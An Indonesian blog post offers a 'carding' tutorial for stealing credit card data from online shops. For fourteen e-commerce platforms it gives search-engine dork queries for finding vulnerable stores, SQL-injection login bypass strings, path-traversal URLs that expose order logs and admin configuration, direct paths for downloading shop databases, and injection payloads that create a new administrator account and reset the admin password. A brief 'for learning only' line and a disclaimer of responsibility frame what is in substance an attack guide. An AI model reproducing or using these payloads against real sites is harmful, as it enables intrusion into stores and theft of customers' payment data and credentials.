Senin, 26 Maret 2018

Cara Carding Toko Online



Kali ini saya akan share tentang hacker dengan cara menggunakan teknik carding,teknik carding ini lumayan ampuh membobol suatu data yang di inginkan. Disini saya akan berbagi sedikit mengenai teknik carding. Teknik carding ini saya peroleh dari sumber saat gooling.

Oke, Langsung lihat dan praktekin aja sob......

Saran saya, gunakanlah teknik ini dengan tujuan pembelajaran dan jangan digunakan untuk tujuan-tujuan yang tidak baik, di karenakan dapat berdampak buruk buat anda sendiri nantinya.

1. Contoh Bugs Pada Bentuk Toko Sistem Shopadmin 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : 
www.xxxxxx.com/shopadmin.asp

Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1


2. Contoh Bugs Pada Bentuk Toko Sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : 
www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm

Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya : www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log



3. Contoh Bugs Pada Bentuk Toko Sistem : Metacart 
contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti :
google.com allinurl:/metacart/
Contoh target : 
www.xxxxxx.com/metacart/about.asp

Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : 
www.xxxxxx.com/metacart/database/metacart.mdb



4. Contoh Bugs Pada Bentuk Toko Sistem : DCShop 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : 
www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : 
www.xxxx.com/xxxx/DCShop/orders/orders.txt



5. Contoh Bugs Pada Bentuk Toko Sistem : PDshopro 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : 
www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/
dbsetup.asp
Hasilnya : 
www.xxxxxx.com/admin/dbsetup.asp

Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi :
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)



6. Contoh Bugs Pada Bentuk Toko Sistem : commerceSQL 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : 
www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : 
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...



7. Contoh Bugs Pada Bentuk Toko Sistem : EShop 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : 
www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : 
www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)



8. Contoh Bugs Pada Bentuk Toko Sistem : Cart32 v3.5a 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : 
www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error

Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
 kebawah, dan cari bagian Page Setup and DirectoryKalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data ccCopy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.



Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh 
http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32



9. Contoh Bugs Pada Bentuk Toko Sistem : VP-ASP Shopping Cart 5.0 
teknik/jalan ke dua
 google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
 shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%...,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--

Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password
 admin
Untuk login admin ke 
http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya



10. Contoh Bugs Pada Bentuk Toko Sistem : VP-ASP Shopping Cart 5.0 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.

Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp



11. Contoh Bugs Pada Bentuk Toko Sistem : Lobby.asp 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : 
www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : 
www.xxxxx.com/fpdb/shop.mdb



12. Contoh Bugs Pada Bentuk Toko sistem : Shopper.cgi 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : 
www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : 
www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template...



13. Contoh Bugs Pada Bentuk Toko Sistem :Proddetail.asp 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : 
www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/
vsproducts.mdb
Hasilnya : 
www.xxxxxx.org/fpdb/vsproducts.mdb



14. Contoh Bugs Pada Bentuk Toko Sistem :Digishop 
contoh toko akan muncul di search engine bila mengetikan beberapa
 keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : 
http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya 
http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : 'or"="
Password : 'or"="

.::Note!::..

=: I DONT TAKE ANY RESPONSIBLE FOR ANYTING... U TAKE UR OWN RISK..!!!  :=


OK SOB.....Sekian posting saya mengenai Tehnik-Tehnik Carding - Hacking.

Semoga bermanfaat.....!!

Tidak ada komentar:

Posting Komentar

Dibuat oleh> AGUN RUDOLVO